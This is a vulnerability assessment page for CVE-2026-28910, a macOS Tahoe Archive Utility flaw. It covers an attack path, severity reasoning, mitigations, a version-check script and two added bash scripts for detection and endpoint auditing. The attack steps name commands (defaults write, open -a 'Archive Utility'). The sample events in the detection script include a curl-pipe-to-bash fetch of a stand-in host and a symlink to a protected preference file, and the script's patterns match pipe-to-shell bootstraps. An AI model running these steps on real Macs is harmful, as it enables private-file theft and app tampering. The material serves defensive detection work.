CACHED · 2026-05-17 09:42:19
CVE-2026-28910 · CWE-284 · Disclosed 2026-05-11

This issue was addressed with improved permissions checking

ASSESSED — NOISGATE V0.5 · Vendor: LOW (3.3) · Reassessed: MEDIUM (5.9)
01 · The Real Story

This is a master key hidden inside a janitor cart, but the attacker still has to get invited into the building first

CVE-2026-28910 is an Archive Utility permission-checking flaw in macOS Tahoe 26.0 through 26.3 that Apple fixed in macOS Tahoe 26.4. Apple describes it as a malicious app being able to access arbitrary files, and the public Mysk research shows a practical chain that can read files from app containers, reach TCC-protected locations like ~/Desktop and ~/Documents, and tamper with third-party app bundles.

Apple's LOW / 3.3 rating understates the impact, while its UI:N vector overstates the reachability. In real fleets this is not initial access: the attacker needs code execution as the user and a very specific drag-and-drop action, which is meaningful friction; but once that hurdle is cleared, the blast radius is far beyond a routine low-grade local info leak, so I upgrade it to MEDIUM.

"Public PoC and broad data access make this more than a LOW, but it still starts with local code execution and user help."
02 · The Attack Path

4 steps from start to impact.

STEP 01

Get user-level code running with a pb2au-style installer

The public research uses a social-engineered installer flow in which the victim runs a shell script in Terminal without sudo. The script stages the later abuse path and needs no privilege escalation, so the attacker only needs execution as a normal user. The public write-up names its two primitives pb2au and au-cp.
Conditions required:
  • Target is running macOS Tahoe 26.0-26.3
  • Victim executes attacker-supplied code as their own user
  • Terminal or equivalent script execution is permitted
Where this breaks in practice:
  • This is already post-initial-access or requires a successful user-execution phish
  • App control, Gatekeeper policy, developer-tool restrictions, or EDR can kill the chain here
  • Non-technical users are less likely to paste shell bootstrap commands than developer-heavy cohorts
Detection/coverage: Good EDR coverage for curl|bash, suspicious sh/bash child processes, DMG mount activity, and script-driven Terminal execution. Traditional vuln scanners do not see this step.
STEP 02

Abuse drag-and-drop to grant Terminal access to Archive Utility preferences

The attacker then tricks the user into dragging what looks like an app or installer artifact but is really an alias or symlink; the drop grants Terminal access to com.apple.archiveutility.plist, and that access is the bridge to changing Archive Utility behavior without elevated privileges.
Conditions required:
  • Interactive user present
  • User performs the drag-and-drop action
  • Attacker can present the alias/symlink convincingly enough to pass as a normal install step
Where this breaks in practice:
  • This is a second, specific social-engineering step despite the vendor vector claiming UI:N
  • Managed users may notice the Terminal window or odd drag target
  • Security awareness, app-install restrictions, and EDR-assisted user prompts reduce success rate
Detection/coverage: Native remote detection is weak. Hunt for access to ~/Library/Containers/com.apple.archiveutility/Data/Library/Preferences/com.apple.archiveutility.plist, suspicious alias/symlink creation, and installer flows that stage fake Applications-folder drag-and-drop behavior.
STEP 03

Rewrite Archive Utility behavior with defaults and trigger au-cp

With access to the preference file, the attacker uses defaults write com.apple.archiveutility ... and open -a "Archive Utility" to steer Archive Utility into archiving and rehydrating protected files into attacker-controlled locations. The public au-cp sequence demonstrates copying data out of app containers and bypassing intended access boundaries.
Conditions required:
  • Archive Utility present and vulnerable
  • Preference file writable via the granted access path
  • Target files are reachable through the vulnerable Archive Utility flow
Where this breaks in practice:
  • Only vulnerable Tahoe builds are affected
  • SIP still limits some protected system areas
  • The sequence is noisy enough for a decent EDR rule once you know what to look for
Detection/coverage: Moderate detection opportunity: alert on defaults write com.apple.archiveutility, headless/noninteractive Archive Utility launches, and Archive Utility touching protected container paths. Vulnerability scanners remain mostly version-only.
STEP 04

Steal data or tamper with trusted apps

The practical end state is not just low-value file disclosure. Public research shows access to Notes, Messages, Safari, Mail, WhatsApp, Telegram, and TCC-protected folders, plus replacement of executables inside app bundles under /Applications for persistence or impersonation.
Conditions required:
  • Interesting user data exists on the host
  • Attacker has a path to exfiltrate data or wait for the user to launch a tampered app
  • Some targets may require follow-on prompts for keychain or TCC-protected operations
Where this breaks in practice:
  • Some high-value follow-on actions still hit keychain prompts or app-specific protections
  • DLP, EDR, and outbound controls may catch bulk exfiltration
  • Blast radius is largely endpoint-local rather than tenant-wide or wormable
Detection/coverage: Good downstream detection if you monitor unusual reads from app containers, archive files staged from protected paths, app bundle modification under /Applications, and subsequent outbound transfers. No meaningful external scanner coverage.
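The detection notes on the four steps above keep returning to the same handful of command-line indicators: pipe-to-shell bootstraps, writes to the com.apple.archiveutility preference domain, anything that names the container plist directly, and scripted launches of Archive Utility. The script below is an added example (mine, not code from the noisgate page or from the Mysk research) that turns those indicators into a triage pass over process-execution events. The event format (tab-separated timestamp, user, parent process, command line), the label names, and the sample lines are constructed for the example; the preference key in the sample is a placeholder, not a real Archive Utility key, and the bootstrap pattern is deliberately loose.

```bash
#!/bin/bash
# Triage process-execution events for the CVE-2026-28910 chain indicators named
# on this page. Added example; event format, labels and samples are constructed.

# Map one command line to an indicator label.
classify_cmd() {
  local cmd="$1"
  case "$cmd" in
    # Step 03: steering Archive Utility through its preference domain.
    *"defaults write com.apple.archiveutility"*|*"defaults import com.apple.archiveutility"*)
      echo "AU_PREFS_WRITE" ;;
    # Step 02: anything that names the container preference file directly
    # (symlink creation, plutil edits, copies of the plist).
    *"com.apple.archiveutility.plist"*)
      echo "AU_PREFS_TOUCH" ;;
    # Step 03: scripted launch of Archive Utility under any quoting of the
    # name, or by bundle identifier.
    *"open -a"*"Archive"*"Utility"*|*"open -b com.apple.archiveutility"*)
      echo "AU_LAUNCH" ;;
    # Step 01: pipe-to-shell bootstraps (loose on purpose: matches sh, bash, zsh).
    *"curl"*"|"*"sh"*|*"wget"*"|"*"sh"*|*'sh -c "$(curl'*|*'bash -c "$(curl'*)
      echo "BOOTSTRAP" ;;
    *)
      echo "BENIGN" ;;
  esac
}

# Read tab-separated "ts<TAB>user<TAB>parent<TAB>cmdline" events on stdin and
# print "label<TAB>ts<TAB>user<TAB>cmdline" for every non-benign event.
triage_events() {
  local ts user parent cmd label
  while IFS=$'\t' read -r ts user parent cmd; do
    [ -n "$cmd" ] || continue
    label=$(classify_cmd "$cmd")
    [ "$label" != "BENIGN" ] || continue
    printf '%s\t%s\t%s\t%s\n' "$label" "$ts" "$user" "$cmd"
  done
  return 0
}

# Constructed EDR-style records, six events for one user session.
sample_events() {
  printf '%s\t%s\t%s\t%s\n' \
    '2026-05-12T09:01:02Z' 'alice' 'Terminal' 'git status' \
    '2026-05-12T09:01:40Z' 'alice' 'Terminal' 'curl -fsSL https://example.invalid/install.sh | bash' \
    '2026-05-12T09:02:11Z' 'alice' 'bash' 'ln -s /Users/alice/Library/Containers/com.apple.archiveutility/Data/Library/Preferences/com.apple.archiveutility.plist /tmp/Installer.app' \
    '2026-05-12T09:03:05Z' 'alice' 'bash' 'defaults write com.apple.archiveutility PlaceholderKey -string /Users/Shared/stage' \
    '2026-05-12T09:03:06Z' 'alice' 'bash' 'open -a "Archive Utility" /Users/Shared/stage/notes.zip' \
    '2026-05-12T09:05:00Z' 'alice' 'Finder' 'open -a Safari'
}

# Stand-alone run: print the four non-benign events from the constructed sample.
sample_events | triage_events
```

Feed real events in the same four-column shape (most EDR exports can be reduced to it with a one-line awk or jq) and look for the sequence BOOTSTRAP, AU_PREFS_TOUCH, AU_PREFS_WRITE, AU_LAUNCH inside one user session within minutes; a single AU_LAUNCH from Finder is normal, the ordered chain from a bash parent is not.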
03 · Intelligence Metadata

The supporting signals.

In-the-wild status: I found no Apple, NVD, CISA KEV, or researcher evidence of active exploitation. This looks like a publicly documented local post-execution chain, not a live mass-exploitation event.
Proof-of-concept availability: Yes. Mysk published a detailed public write-up with named exploit primitives au-cp and pb2au, plus step-by-step attack logic that is enough for a competent operator to reproduce.
EPSS: 0.0001 (user-provided intel; third-party dashboards show roughly 0.00015, about 0.01%). Either way, the forecast is near the floor and matches a local, socially assisted attack path.
KEV status: Not listed in the CISA Known Exploited Vulnerabilities Catalog.
CVSS vector reality check: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N correctly captures local and low-privilege exposure, but the public exploit chain is not really UI:N; it needs a user to run code and perform a specific drag-and-drop. At the same time, the practical blast radius, including app-bundle tampering, is stronger than the C:L / I:N confidentiality-only label suggests.
Affected versions: NVD CPE data marks macOS 26.0 up to, but not including, 26.4 as affected. Apple lists the product as macOS Tahoe.
Fixed version: macOS Tahoe 26.4. Apple released the security content for that build on 2026-03-24 and later added the CVE entry on 2026-05-11.
Exposure/scanning reality: This is a local OS component issue. Shodan/Censys/FOFA-style internet exposure data is not useful here; your real exposure is simply the count of Tahoe 26.0-26.3 Macs in fleet, especially developer and power-user populations willing to run bootstrap scripts.
Disclosure and researchers: Disclosed 2026-05-11. Apple credits Talal Haj Bakry and Tommy Mysk of Mysk Inc. and Zhongquan Li.
Practical impact: Public research claims access to app containers, TCC-protected folders, and third-party app bundles. That makes this an endpoint privacy and persistence problem, not just a harmless local metadata leak.
04 · The Call

noisgate verdict.

Final Verdict
UPGRADED to MEDIUM (5.9/10)

The decisive friction is that the attacker must already have user-level code execution and then win a second, specific drag-and-drop action. That makes this a post-user-execution local bug, but the public PoC materially amplifies impact into meaningful data theft and app tampering, so LOW is too soft.

HIGH Affected version range and fixed build
MEDIUM Enterprise exploitability after user-execution
MEDIUM Practical blast radius described by public research

Why this verdict

  • Upgrade for impact: public research shows practical access to app containers, TCC-protected folders, and application bundles, which is much nastier than a routine low-grade local disclosure bug.
  • Downgrade for attacker position: exploitation starts only after the attacker gets local code running as the user. That is not initial access; it is post-execution on a single Mac.
  • Downgrade for user choreography: despite the vendor vector's UI:N, the published chain needs the victim to run a script and perform a very specific drag-and-drop. Each extra human step compounds failure rate in managed fleets.
  • Downgrade for exposure population: the vulnerable set is limited to Tahoe 26.0-26.3, not all supported Apple operating systems or all macOS branches.
  • No live-fire amplifier: there is no KEV listing and I found no credible active exploitation reporting, which removes the biggest reason to push this into HIGH.

Why not higher?

This is not remotely reachable, not wormable, and not one-click reliable. The attacker needs either a prior foothold or a successful user-execution phish, then a second tailored user action, so the real exposed population is far narrower than a network service bug or a drive-by browser exploit.

Why not lower?

Calling this LOW ignores what the public PoC actually does once it lands: broad endpoint data access and app tampering across trusted local boundaries. In a developer-heavy Mac fleet, users who normalize curl|bash install patterns make this chain practical enough that backlog-only treatment is too relaxed.

05 · Compensating Control

What to do — in priority order.

  1. Block unsanctioned shell-bootstrap installs — Use MDM, application control, or EDR policy to curb curl|bash, sh -c "$(curl ...)", and similar bootstrap patterns on managed Macs. MEDIUM carries no mitigation SLA; apply this in the normal hardening cycle while still patching affected hosts within the 365-day remediation window.
  2. Hunt for Archive Utility preference tampering — Create detections for defaults write com.apple.archiveutility, suspicious access to com.apple.archiveutility.plist, noninteractive open -a "Archive Utility", and archive operations against app-container paths. Treat this as targeted detection engineering rather than an emergency rollout.
  3. Constrain risky Terminal usage on user endpoints — Developer tooling exceptions aside, reduce who can run arbitrary shell installers and mount unsigned DMGs. This does not replace patching, but it cuts the exact social-engineering path the public PoC depends on; roll it out through normal endpoint control changes.
  4. Inventory Tahoe 26.0-26.3 in MDM — Make the problem measurable: identify Macs on the affected version range, then sort by user cohort, privilege, and data sensitivity, and clear the affected population inside the 365-day patch window.
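Item 2 above and the app-bundle tampering described under Step 04 both come down to state that can be inspected on the endpoint itself. The audit below is an added example, not part of the noisgate page or the Mysk research: it reports whether the container preference file named on this page is a symlink or has been populated, dumps the com.apple.archiveutility preference domain, and runs codesign's strict verification over /Applications so a bundle whose executable was replaced shows up as TAMPERED or UNSIGNED. The label names, the mapping from codesign's messages to those labels, and the use of $HOME for the current user are my assumptions; the two pure functions run anywhere, the live checks only on macOS.

```bash
#!/bin/bash
# Endpoint audit for the on-host artefacts of the CVE-2026-28910 chain.
# Added example; label names and the codesign message mapping are assumptions.

# Container preference file named on this page, for the current user.
AU_PREFS="$HOME/Library/Containers/com.apple.archiveutility/Data/Library/Preferences/com.apple.archiveutility.plist"

# A symlink at the preference path is the Step 02 artefact; a regular file is
# normal; an absent file means no preferences were ever written.
prefs_path_status() {
  local p="$1"
  if [ -L "$p" ]; then echo "SYMLINK"
  elif [ -f "$p" ]; then echo "PRESENT"
  else echo "MISSING"
  fi
}

# Map a codesign --verify result (exit status plus combined output) to a label.
classify_codesign() {
  local status="$1" out="$2"
  if [ "$status" -eq 0 ]; then echo "OK"; return 0; fi
  case "$out" in
    *"not signed at all"*) echo "UNSIGNED" ;;
    *"have been modified"*|*"sealed resource"*|*"failed strict validation"*) echo "TAMPERED" ;;
    *) echo "CHECK(status=$status)" ;;
  esac
}

# Strict, deep signature verification of every bundle in /Applications. A
# replaced executable breaks the seal and lands in TAMPERED.
audit_applications() {
  local app status out
  command -v codesign >/dev/null 2>&1 || { echo "codesign not available"; return 0; }
  for app in /Applications/*.app; do
    [ -d "$app" ] || continue
    status=0
    out=$(codesign --verify --deep --strict "$app" 2>&1) || status=$?
    printf '%s\t%s\n' "$(classify_codesign "$status" "$out")" "$app"
  done
  return 0
}

# Preference-file state plus whatever the domain currently holds.
audit_archive_utility_prefs() {
  printf 'container plist: %s (%s)\n' "$(prefs_path_status "$AU_PREFS")" "$AU_PREFS"
  if [ -f "$AU_PREFS" ] && command -v plutil >/dev/null 2>&1; then
    plutil -p "$AU_PREFS" 2>/dev/null || true
  fi
  if command -v defaults >/dev/null 2>&1; then
    echo "defaults domain com.apple.archiveutility:"
    defaults read com.apple.archiveutility 2>/dev/null || echo "  (no keys set)"
  fi
  return 0
}

# Live checks only make sense on macOS; the pure helpers above run anywhere.
if [ "$(uname -s 2>/dev/null)" = "Darwin" ]; then
  audit_archive_utility_prefs
  audit_applications
fi
```

Run it as the user whose container you care about (the preference path is per user), and expect the /Applications pass to take a while on a large install because --deep walks nested bundles; a baseline run on a clean Mac tells you which third-party apps already report CHECK or UNSIGNED so that only new TAMPERED results need a look.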
What doesn't work
  • A WAF, NGFW, or perimeter scanner does nothing here because this is not a network-reachable service flaw.
  • Relying on TCC prompts alone is not enough; the public research shows access can still succeed even when the user chooses Don't Allow.
  • A generic version-only vulnerability scan helps with inventory, but it does not stop the exploit chain or tell you whether users are exposed to the social-engineering preconditions.
06 · Verification

Crowdsourced verification payload.

Run this on the target Mac itself from Terminal, locally or through your MDM/remote shell. Run it with bash (the payload is labeled noisgate-verify.sh here and its header comment calls it check-cve-2026-28910.sh; either name works); it needs no admin privileges and reports VULNERABLE, PATCHED, or UNKNOWN based on the installed macOS version, with builds below 26.0 treated as outside the published range.

noisgate-verify.sh · BASH · READ-ONLY · SAFE
#!/bin/bash
# check-cve-2026-28910.sh
# Determine likely exposure to CVE-2026-28910 by macOS version.
# Affected according to NVD/Apple: macOS Tahoe 26.0 through 26.3
# Fixed: macOS Tahoe 26.4
# Exit codes: 0=PATCHED or NOT AFFECTED, 1=VULNERABLE, 2=UNKNOWN

set -u

ver_ge() {
  # returns 0 if $1 >= $2
  local IFS=.
  local i
  local -a va vb
  read -r -a va <<< "$1"
  read -r -a vb <<< "$2"
  local len=${#va[@]}
  if [ ${#vb[@]} -gt "$len" ]; then
    len=${#vb[@]}
  fi
  for ((i=0; i<len; i++)); do
    local a=${va[i]:-0}
    local b=${vb[i]:-0}
    if ((10#$a > 10#$b)); then
      return 0
    fi
    if ((10#$a < 10#$b)); then
      return 1
    fi
  done
  return 0
}

ver_lt() {
  # returns 0 if $1 < $2
  if ver_ge "$1" "$2"; then
    return 1
  else
    return 0
  fi
}

if [ "$(uname -s 2>/dev/null)" != "Darwin" ]; then
  echo "UNKNOWN - not running on macOS"
  exit 2
fi

if ! command -v sw_vers >/dev/null 2>&1; then
  echo "UNKNOWN - sw_vers not available"
  exit 2
fi

VER="$(sw_vers -productVersion 2>/dev/null)"
if [ -z "$VER" ]; then
  echo "UNKNOWN - unable to read macOS version"
  exit 2
fi

# Optional sanity check: Archive Utility should exist on macOS.
ARCHIVE_APP="/System/Library/CoreServices/Applications/Archive Utility.app"
if [ ! -d "$ARCHIVE_APP" ]; then
  echo "UNKNOWN - Archive Utility not found at expected path; macOS version is $VER"
  exit 2
fi

if ver_ge "$VER" "26.0" && ver_lt "$VER" "26.4"; then
  echo "VULNERABLE - macOS $VER is in the affected range for CVE-2026-28910"
  exit 1
fi

if ver_ge "$VER" "26.4"; then
  echo "PATCHED - macOS $VER includes the fix for CVE-2026-28910"
  exit 0
fi

# Versions below 26.0 are outside the published affected range; they are not
# "patched", they were never affected, so say so rather than reusing PATCHED.
echo "NOT AFFECTED - macOS $VER is below the published affected range for CVE-2026-28910"
exit 0
07 · Bottom Line

If you remember one thing.

TL;DR
Monday morning: pull an MDM inventory for macOS Tahoe 26.0-26.3, then rank those Macs by user behavior risk, especially developer and power-user endpoints where shell bootstrap installs are normal. MEDIUM carries no noisgate mitigation SLA, so go straight to the 365-day remediation window: get affected Macs to macOS Tahoe 26.4 within 365 days, and use routine hardening and detection work to squeeze down the social-engineering path in the meantime.

Sources

  1. Apple security advisory for macOS Tahoe 26.4
  2. NVD record for CVE-2026-28910
  3. Mysk technical write-up and PoC details
  4. CISA Known Exploited Vulnerabilities Catalog
  5. Tenable CVE page with EPSS data
  6. Apple Developer: App Sandbox
  7. Apple Developer: Protecting local app data using containers on macOS